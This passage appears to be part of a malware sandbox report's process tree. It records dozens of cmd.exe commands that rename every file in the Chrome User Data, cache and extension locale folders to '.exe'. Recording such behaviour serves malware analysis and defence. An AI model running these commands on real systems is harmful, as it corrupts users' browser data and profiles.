        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\hyphen-data\*.*" "*.exe"
        5⤵
        
        PID:1940
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm\*.*" "*.exe"
        5⤵
        
        PID:3784
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\MEIPreload\*.*" "*.exe"
        5⤵
        
        PID:2992
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\*.*" "*.exe"
        5⤵
        
        PID:4756
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OptimizationHints\*.*" "*.exe"
        5⤵
        
        PID:4576
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OriginTrials\*.*" "*.exe"
        5⤵
        
        PID:2924
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1628
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\PKIMetadata\*.*" "*.exe"
        5⤵
        
        PID:1620
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\PrivacySandboxAttestationsPreloaded\*.*" "*.exe"
        5⤵
        
        PID:1260
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\RecoveryImproved\*.*" "*.exe"
        5⤵
        
        PID:1052
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SafetyTips\*.*" "*.exe"
        5⤵
        
        PID:116
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\segmentation_platform\*.*" "*.exe"
        5⤵
        
        PID:2092
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\*.*" "*.exe"
        5⤵
        
        PID:2168
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\*.*" "*.exe"
        5⤵
        
        PID:2748
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Subresource Filter\*.*" "*.exe"
        5⤵
        
        PID:1876
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\*.*" "*.exe"
        5⤵
        
        PID:3484
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\TpcdMetadata\*.*" "*.exe"
        5⤵
        
        PID:1536
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\*.*" "*.exe"
        5⤵
        
        PID:5112
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\WidevineCdm\*.*" "*.exe"
        5⤵
        
        PID:2116
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ZxcvbnData\*.*" "*.exe"
        5⤵
        
        PID:3308
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\attachments\*.*" "*.exe"
        5⤵
        
        PID:1048
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports\*.*" "*.exe"
        5⤵
        
        PID:4748
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\*.*" "*.exe"
        5⤵
        
        PID:4772
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\blob_storage\*.*" "*.exe"
        5⤵
        
        PID:4516
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\*.*" "*.exe"
        5⤵
        
        PID:2488
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\*.*" "*.exe"
        5⤵
        
        PID:1704
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\chrome_cart_db\*.*" "*.exe"
        5⤵
        
        PID:4244
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\*.*" "*.exe"
        5⤵
        
        PID:1612
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\*.*" "*.exe"
        5⤵
        
        PID:4920
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\coupon_db\*.*" "*.exe"
        5⤵
        
        PID:4868
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\databases\*.*" "*.exe"
        5⤵
        
        PID:3604
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\*.*" "*.exe"
        5⤵
        
        PID:1844
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\discounts_db\*.*" "*.exe"
        5⤵
        
        PID:2396
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\*.*" "*.exe"
        5⤵
        
        PID:2160
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3616
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\*.*" "*.exe"
        5⤵
        
        PID:2176
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\*.*" "*.exe"
        5⤵
        
        PID:4088
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\*.*" "*.exe"
        5⤵
        
        PID:4316
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\*.*" "*.exe"
        5⤵
        
        PID:1680
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\*.*" "*.exe"
        5⤵
        
        PID:1108
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1272
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\*.*" "*.exe"
        5⤵
        
        PID:1888
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\*.*" "*.exe"
        5⤵
        
        PID:2180
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*.*" "*.exe"
        5⤵
        
        PID:708
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\*.*" "*.exe"
        5⤵
        
        PID:2716
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\*.*" "*.exe"
        5⤵
        
        PID:2788
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\*.*" "*.exe"
        5⤵
        
        PID:3184
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\parcel_tracking_db\*.*" "*.exe"
        5⤵
        
        PID:872
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\*.*" "*.exe"
        5⤵
        
        PID:4608
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\*.*" "*.exe"
        5⤵
        
        PID:4836
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network\*.*" "*.exe"
        5⤵
        
        PID:2728
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\*.*" "*.exe"
        5⤵
        
        PID:3660
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\*.*" "*.exe"
        5⤵
        
        PID:1676
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\*.*" "*.exe"
        5⤵
        
        PID:2400
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\*.*" "*.exe"
        5⤵
        
        PID:4812
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary\*.*" "*.exe"
        5⤵
        
        PID:1360
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\*.*" "*.exe"
        5⤵
        
        PID:2628
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4400
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\*.*" "*.exe"
        5⤵
        
        PID:4456
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1888
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\*.*" "*.exe"
        5⤵
        
        PID:4800
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\*.*" "*.exe"
        5⤵
        
        PID:2168
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\WebStorage\*.*" "*.exe"
        5⤵
        
        PID:708
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\blob_storage\b533ebe0-34b0-48e9-ad72-e15dc55159b6\*.*" "*.exe"
        5⤵
        
        PID:1876
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\*.*" "*.exe"
        5⤵
        
        PID:2944
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\*.*" "*.exe"
        5⤵
        
        PID:4484
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\*.*" "*.exe"
        5⤵
        
        PID:4856
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\*.*" "*.exe"
        5⤵
        
        PID:2396
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\*.*" "*.exe"
        5⤵
        
        PID:4836
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\*.*" "*.exe"
        5⤵
        
        PID:3560
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3972
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\*.*" "*.exe"
        5⤵
        
        PID:2228
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\*.*" "*.exe"
        5⤵
        
        PID:2856
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\*.*" "*.exe"
        5⤵
        
        PID:3676
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\*.*" "*.exe"
        5⤵
        
        PID:560
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\*.*" "*.exe"
        5⤵
        
        PID:1796
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_metadata\*.*" "*.exe"
        5⤵
        
        PID:2488
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\af\*.*" "*.exe"
        5⤵
        
        PID:4840
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\am\*.*" "*.exe"
        5⤵
        
        PID:1704
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\ar\*.*" "*.exe"
        5⤵
        
        PID:2344
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\az\*.*" "*.exe"
        5⤵
        
        PID:1052
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\be\*.*" "*.exe"
        5⤵
        
        PID:4548
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\bg\*.*" "*.exe"
        5⤵
        
        PID:1472
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\bn\*.*" "*.exe"
        5⤵
        
        PID:2716
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\ca\*.*" "*.exe"
        5⤵
        
        PID:2288
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\cs\*.*" "*.exe"
        5⤵
        
        PID:1636
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\cy\*.*" "*.exe"
        5⤵
        
        PID:540
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\da\*.*" "*.exe"
        5⤵
        
        PID:3344
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4708
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\de\*.*" "*.exe"
        5⤵
        
        PID:5112
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\el\*.*" "*.exe"
        5⤵
        
        PID:4932
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\en\*.*" "*.exe"
        5⤵
        
        PID:4316
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\en_CA\*.*" "*.exe"
        5⤵
        
        PID:3652
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\en_GB\*.*" "*.exe"
        5⤵
        
        PID:2616
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\en_US\*.*" "*.exe"
        5⤵
        
        PID:4560
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\es\*.*" "*.exe"
        5⤵
        
        PID:4872
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\es_419\*.*" "*.exe"
        5⤵
        
        PID:64
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\et\*.*" "*.exe"
        5⤵
        
        PID:3020
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\eu\*.*" "*.exe"
        5⤵
        
        PID:1876
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\fa\*.*" "*.exe"
        5⤵
        
        PID:3108
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\fi\*.*" "*.exe"
        5⤵
        
        PID:3508
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\fil\*.*" "*.exe"
        5⤵
        
        PID:2136
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\fr\*.*" "*.exe"
        5⤵
        
        PID:4608
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\fr_CA\*.*" "*.exe"
        5⤵
        
        PID:3988
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\gl\*.*" "*.exe"
        5⤵
        
        PID:2728
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\gu\*.*" "*.exe"
        5⤵
        
        PID:4324
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\hi\*.*" "*.exe"
        5⤵
        
        PID:2000
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\hr\*.*" "*.exe"
        5⤵
        
        PID:1940
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\hu\*.*" "*.exe"
        5⤵
        
        PID:4836
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\hy\*.*" "*.exe"
        5⤵
        
        PID:5112
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2180
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\id\*.*" "*.exe"
        5⤵
        
        PID:4812
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\is\*.*" "*.exe"
        5⤵
        
        PID:2400
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\it\*.*" "*.exe"
        5⤵
        
        PID:1260
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\iw\*.*" "*.exe"
        5⤵
        
        PID:2764
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\ja\*.*" "*.exe"
        5⤵
        
        PID:5092
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\ka\*.*" "*.exe"
        5⤵
        
        PID:2120
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\kk\*.*" "*.exe"
        5⤵
        
        PID:4800
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\km\*.*" "*.exe"
        5⤵
        
        PID:3020
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\kn\*.*" "*.exe"
        5⤵
        
        PID:1776
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\ko\*.*" "*.exe"
        5⤵
        
